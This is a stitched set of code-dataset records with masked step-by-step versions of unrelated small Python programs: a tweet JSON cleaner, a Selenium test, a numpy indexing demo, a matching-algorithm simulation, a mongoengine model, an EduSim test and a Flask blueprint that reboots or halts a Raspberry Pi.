cleanLine.update({"location" : {"country": decoded['place']['country'], "city": decoded['place']['name']} })
else:
cleanLine.update({"location" : {} })
if decoded.get('retweeted_status') is not None:
cleanLine.update({"retweeted" : True })
if decoded.get('retweeted_status').get('extended_tweet') is not None:
cleanLine.update({"RT_text" : encodeText(decoded['retweeted_status']['extended_tweet']['full_text']) })
else:
cleanLine.update({"RT_text" : encodeText(decoded['retweeted_status']['text']) })
cleanLine.update({"RT_user_id" : decoded['retweeted_status']['user']['id'] })
cleanLine.update({"RT_user_name" : '@' + decoded['retweeted_status']['user']['screen_name'] })
else:
cleanLine.update({"retweeted" : False})
cleanLines.append(cleanLine)
except Exception as e:
print(e, " :: ", line)
ptrFile_out.write(json.dumps(cleanLines, ensure_ascii=False))
ptrFile_out.close()
if __name__ == '__main__':
path_in = params.folder_path
path_out = params.clean_path
for f in listdir(path_in):
file_in = join(path_in, f)
file_out = join(path_out, f)
if isfile(file_in):
parse_file(file_in, file_out)
|
normal
|
{
"blob_id": "e3afaabc1f7f64b9189fc88dd478ed75e81f35e1",
"index": 4564,
"step-1": "<mask token>\n\n\ndef parse_file(file_in, file_out):\n ptrFile_in = open(file_in, 'r')\n ptrFile_out = open(file_out, 'w', encoding='utf-8')\n cleanLines = []\n for line in ptrFile_in:\n cleanLine = {}\n line = line.rstrip()\n if line != '':\n try:\n decoded = json.loads(line)\n cleanLine.update({'id': decoded['id']})\n cleanLine.update({'date': decoded['created_at']})\n if decoded.get('extended_tweet') is not None:\n cleanLine.update({'text': encodeText(decoded[\n 'extended_tweet']['full_text'])})\n else:\n cleanLine.update({'text': encodeText(decoded['text'])})\n cleanLine.update({'user_id': decoded['user']['id']})\n cleanLine.update({'user_name': '@' + decoded['user'][\n 'screen_name']})\n if decoded.get('place') is not None:\n cleanLine.update({'location': {'country': decoded[\n 'place']['country'], 'city': decoded['place']['name']}}\n )\n else:\n cleanLine.update({'location': {}})\n if decoded.get('retweeted_status') is not None:\n cleanLine.update({'retweeted': True})\n if decoded.get('retweeted_status').get('extended_tweet'\n ) is not None:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['extended_tweet'][\n 'full_text'])})\n else:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['text'])})\n cleanLine.update({'RT_user_id': decoded[\n 'retweeted_status']['user']['id']})\n cleanLine.update({'RT_user_name': '@' + decoded[\n 'retweeted_status']['user']['screen_name']})\n else:\n cleanLine.update({'retweeted': False})\n cleanLines.append(cleanLine)\n except Exception as e:\n print(e, ' :: ', line)\n ptrFile_out.write(json.dumps(cleanLines, ensure_ascii=False))\n ptrFile_out.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef encodeText(tweet_text):\n tweet_text = tweet_text.replace('\\n', ' ')\n return str(tweet_text)\n\n\ndef parse_file(file_in, file_out):\n ptrFile_in = open(file_in, 'r')\n ptrFile_out = open(file_out, 'w', encoding='utf-8')\n cleanLines = []\n for line in ptrFile_in:\n cleanLine = {}\n line = line.rstrip()\n if line != '':\n try:\n decoded = json.loads(line)\n cleanLine.update({'id': decoded['id']})\n cleanLine.update({'date': decoded['created_at']})\n if decoded.get('extended_tweet') is not None:\n cleanLine.update({'text': encodeText(decoded[\n 'extended_tweet']['full_text'])})\n else:\n cleanLine.update({'text': encodeText(decoded['text'])})\n cleanLine.update({'user_id': decoded['user']['id']})\n cleanLine.update({'user_name': '@' + decoded['user'][\n 'screen_name']})\n if decoded.get('place') is not None:\n cleanLine.update({'location': {'country': decoded[\n 'place']['country'], 'city': decoded['place']['name']}}\n )\n else:\n cleanLine.update({'location': {}})\n if decoded.get('retweeted_status') is not None:\n cleanLine.update({'retweeted': True})\n if decoded.get('retweeted_status').get('extended_tweet'\n ) is not None:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['extended_tweet'][\n 'full_text'])})\n else:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['text'])})\n cleanLine.update({'RT_user_id': decoded[\n 'retweeted_status']['user']['id']})\n cleanLine.update({'RT_user_name': '@' + decoded[\n 'retweeted_status']['user']['screen_name']})\n else:\n cleanLine.update({'retweeted': False})\n cleanLines.append(cleanLine)\n except Exception as e:\n print(e, ' :: ', line)\n ptrFile_out.write(json.dumps(cleanLines, ensure_ascii=False))\n ptrFile_out.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef encodeText(tweet_text):\n tweet_text = tweet_text.replace('\\n', ' ')\n return str(tweet_text)\n\n\ndef parse_file(file_in, file_out):\n ptrFile_in = open(file_in, 'r')\n ptrFile_out = open(file_out, 'w', encoding='utf-8')\n cleanLines = []\n for line in ptrFile_in:\n cleanLine = {}\n line = line.rstrip()\n if line != '':\n try:\n decoded = json.loads(line)\n cleanLine.update({'id': decoded['id']})\n cleanLine.update({'date': decoded['created_at']})\n if decoded.get('extended_tweet') is not None:\n cleanLine.update({'text': encodeText(decoded[\n 'extended_tweet']['full_text'])})\n else:\n cleanLine.update({'text': encodeText(decoded['text'])})\n cleanLine.update({'user_id': decoded['user']['id']})\n cleanLine.update({'user_name': '@' + decoded['user'][\n 'screen_name']})\n if decoded.get('place') is not None:\n cleanLine.update({'location': {'country': decoded[\n 'place']['country'], 'city': decoded['place']['name']}}\n )\n else:\n cleanLine.update({'location': {}})\n if decoded.get('retweeted_status') is not None:\n cleanLine.update({'retweeted': True})\n if decoded.get('retweeted_status').get('extended_tweet'\n ) is not None:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['extended_tweet'][\n 'full_text'])})\n else:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['text'])})\n cleanLine.update({'RT_user_id': decoded[\n 'retweeted_status']['user']['id']})\n cleanLine.update({'RT_user_name': '@' + decoded[\n 'retweeted_status']['user']['screen_name']})\n else:\n cleanLine.update({'retweeted': False})\n cleanLines.append(cleanLine)\n except Exception as e:\n print(e, ' :: ', line)\n ptrFile_out.write(json.dumps(cleanLines, ensure_ascii=False))\n ptrFile_out.close()\n\n\nif __name__ == '__main__':\n path_in = params.folder_path\n path_out = params.clean_path\n for f in listdir(path_in):\n file_in = join(path_in, f)\n file_out = join(path_out, f)\n if isfile(file_in):\n parse_file(file_in, file_out)\n",
"step-4": "import json\nimport sys\nfrom os import listdir\nfrom os.path import isfile, join\nimport params\n\n\ndef encodeText(tweet_text):\n tweet_text = tweet_text.replace('\\n', ' ')\n return str(tweet_text)\n\n\ndef parse_file(file_in, file_out):\n ptrFile_in = open(file_in, 'r')\n ptrFile_out = open(file_out, 'w', encoding='utf-8')\n cleanLines = []\n for line in ptrFile_in:\n cleanLine = {}\n line = line.rstrip()\n if line != '':\n try:\n decoded = json.loads(line)\n cleanLine.update({'id': decoded['id']})\n cleanLine.update({'date': decoded['created_at']})\n if decoded.get('extended_tweet') is not None:\n cleanLine.update({'text': encodeText(decoded[\n 'extended_tweet']['full_text'])})\n else:\n cleanLine.update({'text': encodeText(decoded['text'])})\n cleanLine.update({'user_id': decoded['user']['id']})\n cleanLine.update({'user_name': '@' + decoded['user'][\n 'screen_name']})\n if decoded.get('place') is not None:\n cleanLine.update({'location': {'country': decoded[\n 'place']['country'], 'city': decoded['place']['name']}}\n )\n else:\n cleanLine.update({'location': {}})\n if decoded.get('retweeted_status') is not None:\n cleanLine.update({'retweeted': True})\n if decoded.get('retweeted_status').get('extended_tweet'\n ) is not None:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['extended_tweet'][\n 'full_text'])})\n else:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['text'])})\n cleanLine.update({'RT_user_id': decoded[\n 'retweeted_status']['user']['id']})\n cleanLine.update({'RT_user_name': '@' + decoded[\n 'retweeted_status']['user']['screen_name']})\n else:\n cleanLine.update({'retweeted': False})\n cleanLines.append(cleanLine)\n except Exception as e:\n print(e, ' :: ', line)\n ptrFile_out.write(json.dumps(cleanLines, ensure_ascii=False))\n ptrFile_out.close()\n\n\nif __name__ == '__main__':\n path_in = params.folder_path\n path_out = params.clean_path\n for f in listdir(path_in):\n file_in = join(path_in, f)\n file_out = join(path_out, f)\n if isfile(file_in):\n parse_file(file_in, file_out)\n",
"step-5": "import json\nimport sys\nfrom os import listdir\nfrom os.path import isfile, join\nimport params\n\ndef encodeText(tweet_text): \n tweet_text = tweet_text.replace('\\n',' ') \n return str(tweet_text)\n\ndef parse_file(file_in, file_out):\n ptrFile_in = open(file_in, \"r\")\n ptrFile_out = open(file_out, \"w\", encoding=\"utf-8\")\n\n cleanLines = []\n for line in ptrFile_in:\n cleanLine = {}\n line = line.rstrip()\n if line != \"\":\n try:\n decoded = json.loads(line)\n cleanLine.update({\"id\" : decoded['id']})\n cleanLine.update({\"date\" : decoded['created_at']})\n if decoded.get('extended_tweet') is not None: \n cleanLine.update({\"text\": encodeText(decoded['extended_tweet']['full_text'])})\n else:\n cleanLine.update({\"text\": encodeText(decoded['text'])}) \n cleanLine.update({\"user_id\" : decoded['user']['id']}) \n cleanLine.update({\"user_name\" : '@' + decoded['user']['screen_name']}) \n\n if decoded.get('place') is not None: \n cleanLine.update({\"location\" : {\"country\": decoded['place']['country'], \"city\": decoded['place']['name']} }) \n else:\n cleanLine.update({\"location\" : {} })\n\n if decoded.get('retweeted_status') is not None: \n cleanLine.update({\"retweeted\" : True })\n if decoded.get('retweeted_status').get('extended_tweet') is not None:\n cleanLine.update({\"RT_text\" : encodeText(decoded['retweeted_status']['extended_tweet']['full_text']) })\n else:\n cleanLine.update({\"RT_text\" : encodeText(decoded['retweeted_status']['text']) })\n cleanLine.update({\"RT_user_id\" : decoded['retweeted_status']['user']['id'] })\n cleanLine.update({\"RT_user_name\" : '@' + decoded['retweeted_status']['user']['screen_name'] }) \n else:\n cleanLine.update({\"retweeted\" : False}) \n \n cleanLines.append(cleanLine)\n except Exception as e:\n print(e, \" :: \", line)\n\n ptrFile_out.write(json.dumps(cleanLines, ensure_ascii=False))\n ptrFile_out.close() \n\nif __name__ == '__main__':\n path_in = params.folder_path \n path_out = params.clean_path\n\n for f in listdir(path_in):\n file_in = join(path_in, f) \n file_out = join(path_out, f) \n if isfile(file_in):\n parse_file(file_in, file_out)\n\n\n \n\n \n \n \n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
link = "http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/"
def test_guest_should_see_button_add_to_basket(browser):
browser.get(link)
btn_add = "btn.btn-lg.btn-primary.btn-add-to-basket"
found_button = WebDriverWait(browser, 5).until(
EC.element_to_be_clickable((By.CLASS_NAME, btn_add))
)
assert found_button != False, 'Do not found the button of add to basket'
|
normal
|
{
"blob_id": "464be943f4fe34dda826ebada9e128f1d7d671ac",
"index": 8485,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = 'btn.btn-lg.btn-primary.btn-add-to-basket'\n found_button = WebDriverWait(browser, 5).until(EC.\n element_to_be_clickable((By.CLASS_NAME, btn_add)))\n assert found_button != False, 'Do not found the button of add to basket'\n",
"step-3": "<mask token>\nlink = 'http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/'\n\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = 'btn.btn-lg.btn-primary.btn-add-to-basket'\n found_button = WebDriverWait(browser, 5).until(EC.\n element_to_be_clickable((By.CLASS_NAME, btn_add)))\n assert found_button != False, 'Do not found the button of add to basket'\n",
"step-4": "from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nlink = 'http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/'\n\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = 'btn.btn-lg.btn-primary.btn-add-to-basket'\n found_button = WebDriverWait(browser, 5).until(EC.\n element_to_be_clickable((By.CLASS_NAME, btn_add)))\n assert found_button != False, 'Do not found the button of add to basket'\n",
"step-5": "from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = \"btn.btn-lg.btn-primary.btn-add-to-basket\"\n found_button = WebDriverWait(browser, 5).until(\n EC.element_to_be_clickable((By.CLASS_NAME, btn_add))\n )\n assert found_button != False, 'Do not found the button of add to basket'",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# accessing array elements rows/columns
import numpy as np
a = np.array([[1, 2, 3, 4, 5, 6, 7], [9, 8, 7, 6, 5, 4, 3]])
print(a.shape) # array shape
print(a)
print('\n')
# specific array element [r,c]
# item 6
print(a[0][5])
# item 8
print(a[1][1]) # or
print(a[1][-6])
# get a specific row/specific column
print(a[1])
print(a[0])
print(a[0, :])
print(a[:, 1]) # prints second column
print('\n')
# get only the even numbers from first row [start_index:end_index:step]
print('even numbers from first row')
print(a[0, 1:8:2])
# change certain value of array
a[1, 2] = 90
print('new array is ',a)
|
normal
|
{
"blob_id": "8cc97ebe0ff7617eaf31919d40fa6c312d7b6f94",
"index": 8814,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(a.shape)\nprint(a)\nprint('\\n')\nprint(a[0][5])\nprint(a[1][1])\nprint(a[1][-6])\nprint(a[1])\nprint(a[0])\nprint(a[0, :])\nprint(a[:, 1])\nprint('\\n')\nprint('even numbers from first row')\nprint(a[0, 1:8:2])\n<mask token>\nprint('new array is ', a)\n",
"step-3": "<mask token>\na = np.array([[1, 2, 3, 4, 5, 6, 7], [9, 8, 7, 6, 5, 4, 3]])\nprint(a.shape)\nprint(a)\nprint('\\n')\nprint(a[0][5])\nprint(a[1][1])\nprint(a[1][-6])\nprint(a[1])\nprint(a[0])\nprint(a[0, :])\nprint(a[:, 1])\nprint('\\n')\nprint('even numbers from first row')\nprint(a[0, 1:8:2])\na[1, 2] = 90\nprint('new array is ', a)\n",
"step-4": "import numpy as np\na = np.array([[1, 2, 3, 4, 5, 6, 7], [9, 8, 7, 6, 5, 4, 3]])\nprint(a.shape)\nprint(a)\nprint('\\n')\nprint(a[0][5])\nprint(a[1][1])\nprint(a[1][-6])\nprint(a[1])\nprint(a[0])\nprint(a[0, :])\nprint(a[:, 1])\nprint('\\n')\nprint('even numbers from first row')\nprint(a[0, 1:8:2])\na[1, 2] = 90\nprint('new array is ', a)\n",
"step-5": "# accessing array elements rows/columns\nimport numpy as np\n\na = np.array([[1, 2, 3, 4, 5, 6, 7], [9, 8, 7, 6, 5, 4, 3]])\nprint(a.shape) # array shape\nprint(a)\nprint('\\n')\n\n# specific array element [r,c]\n# item 6\nprint(a[0][5])\n\n# item 8\nprint(a[1][1]) # or\nprint(a[1][-6])\n\n# get a specific row/specific column\nprint(a[1])\nprint(a[0])\nprint(a[0, :])\nprint(a[:, 1]) # prints second column\nprint('\\n')\n\n# get only the even numbers from first row [start_index:end_index:step]\nprint('even numbers from first row')\nprint(a[0, 1:8:2])\n\n# change certain value of array\na[1, 2] = 90\nprint('new array is ',a)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import pandas as pd
import numpy as np
import random
import csv
import pprint
import datamake
import dafunc_H
def simulation(cnt, a, b):
df, df_collist = datamake.make_df(
'/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/csvdata/sinhuri2018.csv'
)
n, m, k = datamake.stu_num()
df_stu = np.zeros((1, n + 1))
for j in range(cnt):
random.seed(48 + j)
student = datamake.make_stu(n, m, k, a, b)
#print(df_collist)
univ = datamake.univ_make(df, df_collist)
for i in range(200):
dafunc_H.da_H(student, univ, df_collist)
if j == 0:
df_stu = student[:, 0:5].T.copy()
else:
df_stuadd = student[:, 0:5].T.copy()
df_stu = np.vstack((df_stu, df_stuadd))
url = '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/Result/' + str(
cnt) + "-" + str(a) + "-" + str(b) + 'DA-Q.txt'
np.savetxt(url, df_stu, delimiter=',', fmt='%d')
return df_stu
#def stu_summary(df_stu):
res0 = simulation(4, 0.7, 0.8)
#def do_simulation():
print(res0)
|
normal
|
{
"blob_id": "cad00f80afa142b69ced880de000b6b5b230640c",
"index": 6228,
"step-1": "<mask token>\n\n\ndef simulation(cnt, a, b):\n df, df_collist = datamake.make_df(\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/csvdata/sinhuri2018.csv'\n )\n n, m, k = datamake.stu_num()\n df_stu = np.zeros((1, n + 1))\n for j in range(cnt):\n random.seed(48 + j)\n student = datamake.make_stu(n, m, k, a, b)\n univ = datamake.univ_make(df, df_collist)\n for i in range(200):\n dafunc_H.da_H(student, univ, df_collist)\n if j == 0:\n df_stu = student[:, 0:5].T.copy()\n else:\n df_stuadd = student[:, 0:5].T.copy()\n df_stu = np.vstack((df_stu, df_stuadd))\n url = (\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/Result/'\n + str(cnt) + '-' + str(a) + '-' + str(b) + 'DA-Q.txt')\n np.savetxt(url, df_stu, delimiter=',', fmt='%d')\n return df_stu\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef simulation(cnt, a, b):\n df, df_collist = datamake.make_df(\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/csvdata/sinhuri2018.csv'\n )\n n, m, k = datamake.stu_num()\n df_stu = np.zeros((1, n + 1))\n for j in range(cnt):\n random.seed(48 + j)\n student = datamake.make_stu(n, m, k, a, b)\n univ = datamake.univ_make(df, df_collist)\n for i in range(200):\n dafunc_H.da_H(student, univ, df_collist)\n if j == 0:\n df_stu = student[:, 0:5].T.copy()\n else:\n df_stuadd = student[:, 0:5].T.copy()\n df_stu = np.vstack((df_stu, df_stuadd))\n url = (\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/Result/'\n + str(cnt) + '-' + str(a) + '-' + str(b) + 'DA-Q.txt')\n np.savetxt(url, df_stu, delimiter=',', fmt='%d')\n return df_stu\n\n\n<mask token>\nprint(res0)\n",
"step-3": "<mask token>\n\n\ndef simulation(cnt, a, b):\n df, df_collist = datamake.make_df(\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/csvdata/sinhuri2018.csv'\n )\n n, m, k = datamake.stu_num()\n df_stu = np.zeros((1, n + 1))\n for j in range(cnt):\n random.seed(48 + j)\n student = datamake.make_stu(n, m, k, a, b)\n univ = datamake.univ_make(df, df_collist)\n for i in range(200):\n dafunc_H.da_H(student, univ, df_collist)\n if j == 0:\n df_stu = student[:, 0:5].T.copy()\n else:\n df_stuadd = student[:, 0:5].T.copy()\n df_stu = np.vstack((df_stu, df_stuadd))\n url = (\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/Result/'\n + str(cnt) + '-' + str(a) + '-' + str(b) + 'DA-Q.txt')\n np.savetxt(url, df_stu, delimiter=',', fmt='%d')\n return df_stu\n\n\nres0 = simulation(4, 0.7, 0.8)\nprint(res0)\n",
"step-4": "import pandas as pd\nimport numpy as np\nimport random\nimport csv\nimport pprint\nimport datamake\nimport dafunc_H\n\n\ndef simulation(cnt, a, b):\n df, df_collist = datamake.make_df(\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/csvdata/sinhuri2018.csv'\n )\n n, m, k = datamake.stu_num()\n df_stu = np.zeros((1, n + 1))\n for j in range(cnt):\n random.seed(48 + j)\n student = datamake.make_stu(n, m, k, a, b)\n univ = datamake.univ_make(df, df_collist)\n for i in range(200):\n dafunc_H.da_H(student, univ, df_collist)\n if j == 0:\n df_stu = student[:, 0:5].T.copy()\n else:\n df_stuadd = student[:, 0:5].T.copy()\n df_stu = np.vstack((df_stu, df_stuadd))\n url = (\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/Result/'\n + str(cnt) + '-' + str(a) + '-' + str(b) + 'DA-Q.txt')\n np.savetxt(url, df_stu, delimiter=',', fmt='%d')\n return df_stu\n\n\nres0 = simulation(4, 0.7, 0.8)\nprint(res0)\n",
"step-5": "import pandas as pd\nimport numpy as np\nimport random\nimport csv\nimport pprint\nimport datamake\nimport dafunc_H\n\n\ndef simulation(cnt, a, b):\n df, df_collist = datamake.make_df(\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/csvdata/sinhuri2018.csv'\n )\n n, m, k = datamake.stu_num()\n df_stu = np.zeros((1, n + 1))\n\n for j in range(cnt):\n random.seed(48 + j)\n student = datamake.make_stu(n, m, k, a, b)\n #print(df_collist)\n univ = datamake.univ_make(df, df_collist)\n\n for i in range(200):\n dafunc_H.da_H(student, univ, df_collist)\n\n if j == 0:\n df_stu = student[:, 0:5].T.copy()\n\n else:\n df_stuadd = student[:, 0:5].T.copy()\n df_stu = np.vstack((df_stu, df_stuadd))\n\n url = '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/Result/' + str(\n cnt) + \"-\" + str(a) + \"-\" + str(b) + 'DA-Q.txt'\n\n np.savetxt(url, df_stu, delimiter=',', fmt='%d')\n\n return df_stu\n\n\n#def stu_summary(df_stu):\n\nres0 = simulation(4, 0.7, 0.8)\n\n#def do_simulation():\n\nprint(res0)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from mongoengine import Document, StringField, BooleanField, ListField, Q
import exceptions
class Category(Document):
id = StringField(primary_key=True)
name = StringField()
is_base_expenses = BooleanField(default=False)
aliases = ListField(StringField())
@classmethod
def get_category_by_text(cls, category_text: str) ->'Category':
try:
category = cls.objects.get(Q(name=category_text) | Q(aliases=
category_text.lower()))
except Category.DoesNotExist:
raise exceptions.InvalidCategory(
'Нет такой категории по имени или алиасам')
return category
|
normal
|
{
"blob_id": "63d9a0fa0d0747762e65f6f1e85e53090035454c",
"index": 583,
"step-1": "<mask token>\n\n\nclass Category(Document):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Category(Document):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def get_category_by_text(cls, category_text: str) ->'Category':\n try:\n category = cls.objects.get(Q(name=category_text) | Q(aliases=\n category_text.lower()))\n except Category.DoesNotExist:\n raise exceptions.InvalidCategory(\n 'Нет такой категории по имени или алиасам')\n return category\n",
"step-3": "<mask token>\n\n\nclass Category(Document):\n id = StringField(primary_key=True)\n name = StringField()\n is_base_expenses = BooleanField(default=False)\n aliases = ListField(StringField())\n\n @classmethod\n def get_category_by_text(cls, category_text: str) ->'Category':\n try:\n category = cls.objects.get(Q(name=category_text) | Q(aliases=\n category_text.lower()))\n except Category.DoesNotExist:\n raise exceptions.InvalidCategory(\n 'Нет такой категории по имени или алиасам')\n return category\n",
"step-4": "from mongoengine import Document, StringField, BooleanField, ListField, Q\nimport exceptions\n\n\nclass Category(Document):\n id = StringField(primary_key=True)\n name = StringField()\n is_base_expenses = BooleanField(default=False)\n aliases = ListField(StringField())\n\n @classmethod\n def get_category_by_text(cls, category_text: str) ->'Category':\n try:\n category = cls.objects.get(Q(name=category_text) | Q(aliases=\n category_text.lower()))\n except Category.DoesNotExist:\n raise exceptions.InvalidCategory(\n 'Нет такой категории по имени или алиасам')\n return category\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
# coding: utf-8
# 2019/11/27 @ tongshiwei
import pytest
def test_api(env):
assert set(env.parameters.keys()) == {"knowledge_structure", "action_space", "learning_item_base"}
@pytest.mark.parametrize("n_step", [True, False])
def test_env(env, tmp_path, n_step):
from EduSim.Envs.KSS import kss_train_eval, KSSAgent
agent = KSSAgent(env.action_space)
kss_train_eval(
agent,
env,
max_steps=20,
max_episode_num=10,
level="summary",
)
|
normal
|
{
"blob_id": "b1ae3abb6decf4d70bc2372e70cf4f5b868e805d",
"index": 8756,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_api(env):\n assert set(env.parameters.keys()) == {'knowledge_structure',\n 'action_space', 'learning_item_base'}\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef test_api(env):\n assert set(env.parameters.keys()) == {'knowledge_structure',\n 'action_space', 'learning_item_base'}\n\n\[email protected]('n_step', [True, False])\ndef test_env(env, tmp_path, n_step):\n from EduSim.Envs.KSS import kss_train_eval, KSSAgent\n agent = KSSAgent(env.action_space)\n kss_train_eval(agent, env, max_steps=20, max_episode_num=10, level=\n 'summary')\n",
"step-4": "import pytest\n\n\ndef test_api(env):\n assert set(env.parameters.keys()) == {'knowledge_structure',\n 'action_space', 'learning_item_base'}\n\n\[email protected]('n_step', [True, False])\ndef test_env(env, tmp_path, n_step):\n from EduSim.Envs.KSS import kss_train_eval, KSSAgent\n agent = KSSAgent(env.action_space)\n kss_train_eval(agent, env, max_steps=20, max_episode_num=10, level=\n 'summary')\n",
"step-5": "# coding: utf-8\n# 2019/11/27 @ tongshiwei\n\nimport pytest\n\n\ndef test_api(env):\n assert set(env.parameters.keys()) == {\"knowledge_structure\", \"action_space\", \"learning_item_base\"}\n\n\[email protected](\"n_step\", [True, False])\ndef test_env(env, tmp_path, n_step):\n from EduSim.Envs.KSS import kss_train_eval, KSSAgent\n agent = KSSAgent(env.action_space)\n\n kss_train_eval(\n agent,\n env,\n max_steps=20,\n max_episode_num=10,\n level=\"summary\",\n )\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
from flask import Blueprint, render_template, redirect, url_for, flash
import subprocess
def check_output(*args):
return subprocess.Popen(*args, stdout=subprocess.PIPE).communicate()[0]
mod = Blueprint('system', __name__)
@mod.route('/')
def index():
uptime = check_output(["uptime"])
return render_template('system/system.html', uptime=uptime)
@mod.route('/shutdown')
def shutdown():
flash("Shutting down.<br>When the LEDs on the board stop flashing, \
it should be safe to unplug your Raspberry Pi.")
subprocess.call(["sudo", "halt"])
return redirect(url_for('system.index'))
@mod.route('/reboot')
def reboot():
flash("Rebooting... please wait.<br>This will take approx. one minute.")
subprocess.call(["sudo", "reboot"])
return redirect(url_for('system.index'))
|
normal
|
{
"blob_id": "e056a1600b620519e729c597dcec57793284019a",
"index": 1470,
"step-1": "<mask token>\n\n\[email protected]('/shutdown')\ndef shutdown():\n flash(\n 'Shutting down.<br>When the LEDs on the board stop flashing, it should be safe to unplug your Raspberry Pi.'\n )\n subprocess.call(['sudo', 'halt'])\n return redirect(url_for('system.index'))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef check_output(*args):\n return subprocess.Popen(*args, stdout=subprocess.PIPE).communicate()[0]\n\n\n<mask token>\n\n\[email protected]('/')\ndef index():\n uptime = check_output(['uptime'])\n return render_template('system/system.html', uptime=uptime)\n\n\[email protected]('/shutdown')\ndef shutdown():\n flash(\n 'Shutting down.<br>When the LEDs on the board stop flashing, it should be safe to unplug your Raspberry Pi.'\n )\n subprocess.call(['sudo', 'halt'])\n return redirect(url_for('system.index'))\n\n\[email protected]('/reboot')\ndef reboot():\n flash('Rebooting... please wait.<br>This will take approx. one minute.')\n subprocess.call(['sudo', 'reboot'])\n return redirect(url_for('system.index'))\n",
"step-3": "<mask token>\n\n\ndef check_output(*args):\n return subprocess.Popen(*args, stdout=subprocess.PIPE).communicate()[0]\n\n\nmod = Blueprint('system', __name__)\n\n\[email protected]('/')\ndef index():\n uptime = check_output(['uptime'])\n return render_template('system/system.html', uptime=uptime)\n\n\[email protected]('/shutdown')\ndef shutdown():\n flash(\n 'Shutting down.<br>When the LEDs on the board stop flashing, it should be safe to unplug your Raspberry Pi.'\n )\n subprocess.call(['sudo', 'halt'])\n return redirect(url_for('system.index'))\n\n\[email protected]('/reboot')\ndef reboot():\n flash('Rebooting... please wait.<br>This will take approx. one minute.')\n subprocess.call(['sudo', 'reboot'])\n return redirect(url_for('system.index'))\n",
"step-4": "from flask import Blueprint, render_template, redirect, url_for, flash\nimport subprocess\n\n\ndef check_output(*args):\n return subprocess.Popen(*args, stdout=subprocess.PIPE).communicate()[0]\n\n\nmod = Blueprint('system', __name__)\n\n\[email protected]('/')\ndef index():\n uptime = check_output(['uptime'])\n return render_template('system/system.html', uptime=uptime)\n\n\[email protected]('/shutdown')\ndef shutdown():\n flash(\n 'Shutting down.<br>When the LEDs on the board stop flashing, it should be safe to unplug your Raspberry Pi.'\n )\n subprocess.call(['sudo', 'halt'])\n return redirect(url_for('system.index'))\n\n\[email protected]('/reboot')\ndef reboot():\n flash('Rebooting... please wait.<br>This will take approx. one minute.')\n subprocess.call(['sudo', 'reboot'])\n return redirect(url_for('system.index'))\n",
